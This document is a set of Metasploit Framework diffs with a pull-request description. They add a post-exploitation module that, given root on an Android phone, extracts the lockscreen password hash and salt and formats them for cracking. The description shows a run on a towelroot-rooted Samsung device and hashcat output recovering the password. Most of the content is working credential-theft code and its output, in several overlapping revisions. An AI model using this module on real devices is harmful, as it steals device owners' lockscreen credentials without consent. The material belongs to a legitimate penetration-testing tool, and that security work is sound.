+        File.delete(f)
+      end
+    end
+  end
+
+  def hash_file(hashes_regex)
+    hashes = []
+    wrote_hash = false
+    hashlist = Rex::Quickfile.new("hashes_tmp")
+    # descrypt is what JtR calls it, des is what we save it in the db as
+    hashes_regex = hashes_regex.join('|').gsub('descrypt', 'des')
+    regex = Regexp.new hashes_regex
+    framework.db.creds(workspace: myworkspace, type: 'Metasploit::Credential::NonreplayableHash').each do |core|
+      next unless core.private.jtr_format =~ regex
+      # only add hashes which havne't been cracked
+      next unless already_cracked_pass(core.private.data).nil?
+      if action.name == 'john'
+        hashlist.puts hash_to_jtr(core)
+      elsif action.name == 'hashcat'
+        # hashcat hash files dont include the ID to reference back to so we build an array to reference
+        hashes << {'hash' => core.private.data, 'un' => core.public.username, 'id' => core.id}
+        hashlist.puts hash_to_hashcat(core)
+      end
+      wrote_hash = true
+    end
+    hashlist.close
+    unless wrote_hash # check if we wrote anything and bail early if we didn't
+      hashlist.delete
+      fail_with Failure::NotFound, 'No applicable hashes in database to crack'
+    end
+    print_status "Hashes Written out to #{hashlist.path}"
+    return hashlist.path, hashes
+  end
+end

--- a/modules/auxiliary/analyze/crack_mobile.rb
+++ b/modules/auxiliary/analyze/crack_mobile.rb
@@ -84,11 +84,11 @@ class MetasploitModule < Msf::Auxiliary
           results = process_crack(results, hashes, cred, hash_type, method)
         elsif action.name == 'hashcat'
           next unless fields.count >= 2
-          hash = fields.shift
+          hash = "#{fields.shift}:#{fields.shift}" #grab hash and salt
           password = fields.join(':') # Anything left must be the password. This accounts for passwords with : in them
           next if hash.include?("Hashfile '") && hash.include?("' on line ") # skip error lines
           hashes.each do |h|
-            next unless h['hash'] == hash
+            next unless h['hash'].downcase == hash.downcase
             cred = {'core_id' => h['id'],
                     'username' => h['un'],
                     'password' => password}

--- a/modules/post/android/gather/hashdump.rb
+++ b/modules/post/android/gather/hashdump.rb
@@ -43,6 +43,9 @@ class MetasploitModule < Msf::Post
     file_name = File.basename(location)
     ['', '-wal', '-shm'].each do |ext|
       l = location + ext
+      unless file_exist?(l)
+        next
+      end
       f = file_name + ext
       data = read_file(l)
       if data.blank?
@@ -114,10 +117,6 @@ class MetasploitModule < Msf::Post
     end
 
     salt = salt[0][0] # pull string from results Command output: [["5381737017539487883"]] may also be negative, therefore 20 char
-    unless salt.to_s.length.between?(19,20)
-      print_error("Unable to pull salt from database.  Command output: #{salt}")
-      return
-    end
 
     # convert from number string to hex and lowercase
     salt = salt.to_i.to_s(16)

--- a/modules/post/android/gather/hashdump.rb
+++ b/modules/post/android/gather/hashdump.rb
@@ -120,14 +120,17 @@ class MetasploitModule < Msf::Post
       end
     end
 
-    salt = salt[0][0] # pull string from results Command output: [["5381737017539487883"]]
-    unless salt.to_s.length == 19
+    salt = salt[0][0] # pull string from results Command output: [["5381737017539487883"]] may also be negative, therefore 20 char
+    unless salt.to_s.length.between?(19,20)
       print_error("Unable to pull salt from database.  Command output: #{salt}")
       return
     end
 
     # convert from number string to hex and lowercase
     salt = salt.to_i.to_s(16)
+    if salt.start_with?('-')
+      salt[0] = '' # fastest way to remove first character
+    end
     print_good("Password Salt: #{salt}")
 
     sha1 = hash[0...40]

--- a/modules/post/android/gather/hashdump.rb
+++ b/modules/post/android/gather/hashdump.rb
@@ -1,0 +1,158 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'sqlite3'
+require 'fileutils'
+
+class MetasploitModule < Msf::Post
+
+  include Msf::Post::File
+  include Msf::Post::Android::Priv
+
+  def initialize(info={})
+    super( update_info( info, {
+        'Name'          => "Android Gather Dump Password Hashes for Android Systems",
+        'Description'   => %q{
+           Post Module to dump the password hashes for Android System. Root is required.
+           To perform this operation, two things are needed.  First, a password.key file
+           is required as this contains the hash but no salt.  Next, a sqlite3 database
+           is needed (with supporting files) to pull the salt from.  Combined, this
+           creates the hash we need.  This can be cracked with Hashcat, mode 5800.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => ['h00die'],
+        'SessionTypes'  => [ 'meterpreter', 'shell' ],
+        'Platform'      => 'android',
+        'References'    => [
+          ['URL', 'https://www.pentestpartners.com/security-blog/cracking-android-passwords-a-how-to/'],
+          ['URL', 'https://hashcat.net/forum/thread-2202.html'],
+        ],
+      }
+    ))
+  end
+
+  def run
+
+    def read_store_sql(file_name, location)
+      # we need the .db file, as well as the supportinf iles .db-shm and .db-wal as they may contain
+      # the values we are looking for
+      db_loot_name = ''
+      ['', '-wal', '-shm'].each do |ext|
+        l = location + ext
+        f = file_name + ext
+        data = read_file(l)
+        if data.blank?
+          print_error("Unable to read #{l}")
+          return
+        end
+        print_good("Saved #{f} with length #{data.length}")
+
+        if ext == ''
+          loot_file = store_loot('SQLite3 DB', 'application/x-sqlite3', session, data, f, 'Android database')
+          db_loot_name = loot_file
+          next
+        end
+
+        loot_file = store_loot('SQLite3 DB', 'application/binary', session, data, f, 'Android database')
+
+        # in order for sqlite3 to see the -wal and -shm support files, we have to rename them
+        # we have to do this since the ext is > 3
+        # https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/auxiliary/report.rb#L391
+        new_name = "#{db_loot_name}#{ext}"
+        FileUtils.mv(loot_file, new_name)
+      end
+      SQLite3::Database.new(db_loot_name)
+    end
+
+    unless is_root?
+      print_error("This module requires root permissions.")
+      return
+    end
+
+    print_status('Attempting to determine unsalted hash')
+    unless file_exist?('/data/system/password.key')
+      print_error('No password.key file, no password on phone.')
+      return
+    end
+
+    hash = read_file('/data/system/password.key')
+    if hash.empty?
+      print_error('Unable to determine hash')
+      return
+    end
+    store_loot('Key', 'plain/text', session, hash, 'password.key', 'Android password hash key')
+    print_good('Saved password.key')
+
+    print_status('Attempting to determine salt')
+    os = cmd_exec("getprop ro.build.version.release")
+    vprint_status("OS Version: #{os}")
+    if Gem::Version.new(os) < Gem::Version.new('4.3.0')
+      # this is untested.
+      begin
+        vprint_status('Attempting to load <4.3.0 Android settings file')
+        db = read_store_sql('settings.db', '/data/data/com.android.providers.settings/databases/settings.db')
+        salt = db.execute('SELECT lockscreen.password_salt from secure;')
+      rescue SQLite3::SQLException
+        vprint_status('Failed to load old file or find salt value.  Attempting to new Android locksettings file')
+        return
+      end
+    else
+      begin
+        vprint_status('Attempting to load >=4.3.0 Android settings file')
+        db = read_store_sql('locksettings.db', '/data/system/locksettings.db')
+        if db.nil?
+          print_error('Unable to load locksettings.db file.')
+          return
+        end
+        salt = db.execute("select value from locksettings where name='lockscreen.password_salt'")
+      rescue SQLite3::SQLException
+        print_error('Unable to retrieve salt value from database.')
+        return
+      end
+    end
+
+    salt = salt[0][0] # pull string from results Command output: [["5381737017539487883"]]
+    unless salt.to_s.length == 19
+      print_error("Unable to pull salt from database.  Command output: #{salt}")
+      return
+    end
+
+    puts salt
+    # convert from number string to hex and lowercase
+    salt = salt.to_i.to_s(16)
+    print_good("Password Salt: #{salt}")
+
+    sha1 = hash[0...40]
+    print_good("SHA1: #{sha1}:#{salt}")
+    print_good("Crack with: hashcat -m 5800 #{sha1}:#{salt}")
+    credential_data = {
+        jtr_format: 'SHA1',
+        origin_type: :session,
+        post_reference_name: self.refname,
+        private_type: :nonreplayable_hash,
+        private_data: "#{sha1}:#{salt}",
+        session_id: session_db_id,
+        username: '',
+        workspace_id: myworkspace_id
+    }
+    create_credential(credential_data)
+
+    if hash.length > 40
+      md5 = hash[40...72]
+      print_good("MD5: #{md5}:#{salt}")
+      credential_data = {
+          jtr_format: 'MD5',
+          origin_type: :session,
+          post_reference_name: self.refname,
+          private_type: :nonreplayable_hash,
+          private_data: "#{md5}:#{salt}",
+          session_id: session_db_id,
+          username: '',
+          workspace_id: myworkspace_id
+      }
+      create_credential(credential_data)
+    end
+  end
+end

--- a/modules/post/android/gather/hashdump.rb
+++ b/modules/post/android/gather/hashdump.rb
@@ -116,19 +116,18 @@ class MetasploitModule < Msf::Post
       return
     end
 
-    salt = salt[0][0] # pull string from results Command output: [["5381737017539487883"]] may also be negative, therefore 20 char
+    salt = salt[0][0] # pull string from results Command output: [["5381737017539487883"]] may also be negative.
 
     # convert from number string to hex and lowercase
-    salt = salt.to_i.to_s(16)
-    if salt.start_with?('-')
-      salt[0] = '' # fastest way to remove first character
-    end
+    salt = salt.to_i
+    salt += 2**64 if salt < 0 # deal with negatives
+    salt = salt.to_s(16)
     print_good("Password Salt: #{salt}")
 
     sha1 = hash[0...40]
     sha1 = "#{sha1}:#{salt}"
     print_good("SHA1: #{sha1}")
-    print_good("Crack with: hashcat -m 5800 #{sha1}")
+    #print_good("Crack with: hashcat -m 5800 #{sha1}")
     credential_data = {
         jtr_format: identify_hash(sha1),
         origin_type: :session,

--- a/modules/post/android/gather/hashdump.rb
+++ b/modules/post/android/gather/hashdump.rb
@@ -36,39 +36,39 @@ class MetasploitModule < Msf::Post
     ))
   end
 
-  def run
-
-    def read_store_sql(file_name, location)
-      # we need the .db file, as well as the supporting files .db-shm and .db-wal as they may contain
-      # the values we are looking for
-      db_loot_name = ''
-      ['', '-wal', '-shm'].each do |ext|
-        l = location + ext
-        f = file_name + ext
-        data = read_file(l)
-        if data.blank?
-          print_error("Unable to read #{l}")
-          return
-        end
-        print_good("Saved #{f} with length #{data.length}")
-
-        if ext == ''
-          loot_file = store_loot('SQLite3 DB', 'application/x-sqlite3', session, data, f, 'Android database')
-          db_loot_name = loot_file
-          next
-        end
-
-        loot_file = store_loot('SQLite3 DB', 'application/binary', session, data, f, 'Android database')
-
-        # in order for sqlite3 to see the -wal and -shm support files, we have to rename them
-        # we have to do this since the ext is > 3
-        # https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/auxiliary/report.rb#L391
-        new_name = "#{db_loot_name}#{ext}"
-        FileUtils.mv(loot_file, new_name)
+  def read_store_sql(location)
+    # we need the .db file, as well as the supporting files .db-shm and .db-wal as they may contain
+    # the values we are looking for
+    db_loot_name = ''
+    file_name = File.basename(location)
+    ['', '-wal', '-shm'].each do |ext|
+      l = location + ext
+      f = file_name + ext
+      data = read_file(l)
+      if data.blank?
+        print_error("Unable to read #{l}")
+        return
       end
-      SQLite3::Database.new(db_loot_name)
-    end
+      print_good("Saved #{f} with length #{data.length}")
 
+      if ext == ''
+        loot_file = store_loot('SQLite3 DB', 'application/x-sqlite3', session, data, f, 'Android database')
+        db_loot_name = loot_file
+        next
+      end
+
+      loot_file = store_loot('SQLite3 DB', 'application/binary', session, data, f, 'Android database')
+
+      # in order for sqlite3 to see the -wal and -shm support files, we have to rename them
+      # we have to do this since the ext is > 3
+      # https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/auxiliary/report.rb#L391
+      new_name = "#{db_loot_name}#{ext}"
+      FileUtils.mv(loot_file, new_name)
+    end
+    SQLite3::Database.new(db_loot_name)
+  end
+
+  def run
     unless is_root?
       fail_with Failure::NoAccess, 'This module requires root permissions.'
     end
@@ -91,33 +91,26 @@ class MetasploitModule < Msf::Post
     print_status('Attempting to determine salt')
     os = cmd_exec("getprop ro.build.version.release")
     vprint_status("OS Version: #{os}")
-    if Gem::Version.new(os) < Gem::Version.new('4.3.0')
-      # this is untested.
-      begin
-        vprint_status('Attempting to load < 4.3.0 Android settings file')
-        db = read_store_sql('settings.db', '/data/data/com.android.providers.settings/databases/settings.db')
-        if db.nil?
-          print_error('Unable to load settings.db file.')
-          return
-        end
-        salt = db.execute('SELECT lockscreen.password_salt from secure;')
-      rescue SQLite3::SQLException
-        print_error("Failed to pull salt from database.  Command output: #{salt}")
+
+    locksettings_db = '/data/system/locksettings.db'
+    locksettings_sql = "select value from locksettings where name='lockscreen.password_salt';"
+    unless file_exist? locksettings_db
+      vprint_status("Could not find #{locksettings_db}, using settings.db")
+      locksettings_db = '/data/data/com.android.providers.settings/databases/settings.db'
+      locksettings_sql = "select value from secure where name='lockscreen.password_salt';"
+    end
+
+    begin
+      vprint_status("Attempting to load lockscreen db: #{locksettings_db}")
+      db = read_store_sql(locksettings_db)
+      if db.nil?
+        print_error('Unable to load settings.db file.')
         return
       end
-    else
-      begin
-        vprint_status('Attempting to load >= 4.3.0 Android settings file')
-        db = read_store_sql('locksettings.db', '/data/system/locksettings.db')
-        if db.nil?
-          print_error('Unable to load locksettings.db file.')
-          return
-        end
-        salt = db.execute("select value from locksettings where name='lockscreen.password_salt'")
-      rescue SQLite3::SQLException
-        print_error('Unable to retrieve salt value from database.')
-        return
-      end
+      salt = db.execute(locksettings_sql)
+    rescue SQLite3::SQLException
+      print_error("Failed to pull salt from database.  Command output: #{salt}")
+      return
     end
 
     salt = salt[0][0] # pull string from results Command output: [["5381737017539487883"]] may also be negative, therefore 20 char

--- a/spec/lib/metasploit/framework/hashes/identify_spec.rb
+++ b/spec/lib/metasploit/framework/hashes/identify_spec.rb
@@ -252,6 +252,13 @@ RSpec.describe 'hashes/identify' do
     end
   end
 
+  describe 'identify_android_sha1' do
+    it 'returns android-sha1' do
+      hash = identify_hash('EA8457DE97836C955082AE77DBE2CD86A4E8BC0E:4aafc54dc502e88b')
+      expect(hash).to match ('android-sha1')
+    end
+  end
+
   describe 'identify_empty_string' do
     it 'returns empty string' do
       hash = identify_hash('')
@@ -286,6 +293,5 @@ RSpec.describe 'hashes/identify' do
       expect(hash).to match('')
     end
   end
-
 
 end


### PR DESCRIPTION
@timwr  requested I put up a WIP PR on this.
This PR creates an android hashdump function.  root is required, the hash and salt are in 2 different places.  From my testing, it wasn't enough to pull the `.db` file, I had to pull the other 2 supporting files.  When saving them to loot though, they get renamed, which then sqlite3 didn't like them, so I had to 'work around' the issue which took more hours than I care to admit to.
Untested, PIN and pattern are just all number passwords so this should get them as well


## Samsung Galaxy S3 4.4.2
Shell + towelroot.
```
msf5 post(android/gather/hashdump) > rexploit
[*] Reloading module...

[!] SESSION may not be compatible with this module.
[*] Attempting to determine unsalted hash
[+] Saved password.key
[*] Attempting to determine salt
[*] OS Version: 4.4.2
[*] Attempting to load >=4.3.0 Android settings file
[+] Saved locksettings.db with length 4096
[+] Saved locksettings.db-wal with length 140112
[+] Saved locksettings.db-shm with length 32768
5381737017539487883
[+] Password Salt: 4aafc54dc502e88b
[+] SHA1: EA8457DE97836C955082AE77DBE2CD86A4E8BC0E:4aafc54dc502e88b
[-] Post failed: ActiveRecord::RecordInvalid Validation failed: Session can't be blank
```
Throw it to hashcat
```
# hashcat -m 5800 EA8457DE97836C955082AE77DBE2CD86A4E8BC0E:4aafc54dc502e88b /tmp/wordlist 
hashcat (v5.1.0) starting...

nvmlDeviceGetFanSpeed(): Not Supported

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Temperature abort trigger set to 90c

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=1 -D VENDOR_ID=32 -D CUDA_ARCH=300 -D AMD_ROCM=0 -D VECT_SIZE=1 -D DEVICE_TYPE=4 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=5 -D KERN_TYPE=5800 -D _unroll'
* Device #1: Kernel amp_a0.b9293e33.kernel not found in cache! Building may take a while...


Dictionary cache built:
* Filename..: /tmp/wordlist
* Passwords.: 1
* Bytes.....: 5
* Keyspace..: 1
* Runtime...: 0 secs

The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework

Approaching final keyspace - workload adjusted.  

ea8457de97836c955082ae77dbe2cd86a4e8bc0e:4aafc54dc502e88b:test
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Type........: Samsung Android Password/PIN
Hash.Target......: ea8457de97836c955082ae77dbe2cd86a4e8bc0e:4aafc54dc502e88b
Time.Started.....: Sun Oct 27 00:34:04 2019 (0 secs)
Time.Estimated...: Sun Oct 27 00:34:04 2019 (0 secs)
Guess.Base.......: File (/tmp/wordlist)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:       76 H/s (0.72ms) @ Accel:64 Loops:63 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 1/1 (100.00%)
Rejected.........: 0/1 (0.00%)
Restore.Point....: 0/1 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1008-1023
Candidates.#1....: test -> test
Hardware.Mon.#1..: Temp: 50c Util: 50% Core: 705MHz Mem:1400MHz Bus:16

Started: Sun Oct 27 00:34:02 2019
Stopped: Sun Oct 27 00:34:06 2019
```

I'd really like #11695 landed to write a cracker module for android.... but alas
~~I'm also running into DB errors when saving the result.  something to do with the session bla bla bla.~~
~~Add docs~~
~~Test pin~~
~~Clean code~~
~~Also need to look into the state of hash identifier, not sure how valid it is vice whats in #11695 and update to make sure it works with this hash.~~ 
```
# hashid
EA8457DE97836C955082AE77DBE2CD86A4E8BC0E:4aafc54dc502e88b
Analyzing 'EA8457DE97836C955082AE77DBE2CD86A4E8BC0E:4aafc54dc502e88b'
[+] SHA-1 
[+] Double SHA-1 
[+] RIPEMD-160 
[+] Haval-160 
[+] Tiger-160 
[+] HAS-160 
[+] LinkedIn 
[+] Skein-256(160) 
[+] Skein-512(160) 
[+] Android PIN 
[+] Redmine Project Management Web App 
[+] SMF ≥ v1.1 
```